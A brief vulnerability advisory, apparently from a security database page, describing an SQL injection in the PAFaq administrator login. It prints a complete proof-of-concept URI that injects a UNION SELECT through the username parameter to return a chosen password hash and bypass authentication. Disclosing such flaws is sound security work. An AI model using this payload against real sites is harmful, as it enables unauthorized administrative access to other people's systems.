|
PAFaq Administrator Username SQL Injection Vulnerability
No exploit is required. The following proof of concept URI is available: http://www.example.com/pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar |
|
|
Privacy Statement |